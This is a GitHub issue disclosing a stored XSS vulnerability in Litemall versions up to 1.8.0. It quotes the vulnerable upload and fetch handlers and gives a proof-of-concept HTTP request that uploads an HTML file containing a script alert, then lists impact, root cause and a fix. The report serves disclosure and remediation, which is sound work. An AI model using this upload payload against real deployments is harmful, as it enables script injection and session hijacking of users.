Skip to content

Stored XSS Vulnerability in /wx/storage/upload (Litemall ≤ v1.8.0) #567

New issue
New issue
Open
Open
Stored XSS Vulnerability in /wx/storage/upload (Litemall ≤ v1.8.0)#567
@ez-lbz

Description

@ez-lbz
ez-lbz
opened on Jul 28, 2025

Stored XSS Vulnerability in /wx/storage/upload (Litemall ≤ v1.8.0)

Summary

A stored cross-site scripting (XSS) vulnerability exists in Litemall versions ≤ 1.8.0 at the /wx/storage/upload endpoint. The application does not validate file extensions when processing uploaded files, allowing attackers to upload executable files such as .html, .htm, or .pdf. These files are then served back to clients directly without any sanitization, resulting in stored XSS.

Details

The source vulnerable upload functionality is implemented as follows:

@PostMapping("/upload")  
public Object upload(@RequestParam("file") MultipartFile file) throws IOException {  
    String originalFilename = file.getOriginalFilename();  
    LitemallStorage litemallStorage = storageService.store(file.getInputStream(), file.getSize(), file.getContentType(), originalFilename);  
    return ResponseUtil.ok(litemallStorage);  
}

The sink uploaded files can be accessed using:

@GetMapping("/fetch/{key:.+}")
public ResponseEntity<Resource> fetch(@PathVariable String key) {
    LitemallStorage litemallStorage = litemallStorageService.findByKey(key);
    ...
    Resource file = storageService.loadAsResource(key);
    return ResponseEntity.ok()
        .contentType(MediaType.parseMediaType(litemallStorage.getType()))
        .body(file);
}

Since there is no file type restriction and no content sanitization, attackers can upload malicious HTML/JavaScript files, which will be executed when a victim accesses the returned URL.

Proof of Concept (PoC)

Malicious file upload request:

POST /wx/storage/upload HTTP/1.1
Host: localhost:8080
X-Litemall-Admin-Token: 1e68640e-a324-48d0-a8c5-e2fa49efa42d
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4nZrTVGVaxBsDdAW
sec-ch-ua-platform: "Windows"
Origin: http://localhost:9527
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Referer: http://localhost:9527/
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-mobile: ?0
Content-Length: 11378

------WebKitFormBoundary4nZrTVGVaxBsDdAW
Content-Disposition: form-data; name="file"; filename="2.html"
Content-Type: text/html

<script>alert('XSS')</script>
------WebKitFormBoundary4nZrTVGVaxBsDdAW--
Image

Accessing the uploaded file triggers XSS:

http://localhost:8080/wx/storage/fetch/t1c4hvv5inv004ol4zoa.html
Image

Impact

  • Execution of arbitrary JavaScript in the victim’s browser.

  • Cookie theft and session hijacking leading to account takeover.

  • Privilege escalation if an administrator account is targeted.

  • Possible use as a pivot point for further client-side attacks (e.g., phishing).

Root Cause

The vulnerability is caused by lack of file extension validation and direct serving of uploaded files with their original content type, resulting in execution of attacker-controlled code.

Recommendation

Implement strict file extension validation and sanitize uploaded files to prevent execution of active content such as HTML, JavaScript, or PDFs with embedded scripts.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions